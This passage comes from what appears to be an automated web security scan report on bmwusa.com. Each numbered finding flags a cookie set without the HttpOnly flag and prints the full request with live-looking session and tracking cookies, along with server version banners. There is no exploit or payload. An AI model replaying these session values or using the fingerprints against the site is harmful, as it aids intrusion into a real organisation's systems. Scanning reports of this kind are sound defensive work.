<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.217. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:35 GMT;path=/
Content-Length: 202557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.218. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:27 GMT;path=/
Content-Length: 214980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.219. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:52 GMT;path=/
Content-Length: 202285


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.220. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:05 GMT;path=/
Content-Length: 215689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.221. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:33 GMT;path=/
Content-Length: 202195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.222. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:23:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:43:30 GMT;path=/
Content-Length: 214786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.223. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:25:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:45:45 GMT;path=/
Content-Length: 202076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.224. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:20 GMT;path=/
Content-Length: 214910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.225. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:29 GMT;path=/
Content-Length: 202153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.226. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:39 GMT;path=/
Content-Length: 202155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.227. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:01 GMT;path=/
Content-Length: 214935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.228. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:11 GMT;path=/
Content-Length: 225966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.229. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:19 GMT;path=/
Content-Length: 215092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.230. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:36 GMT;path=/
Content-Length: 202376


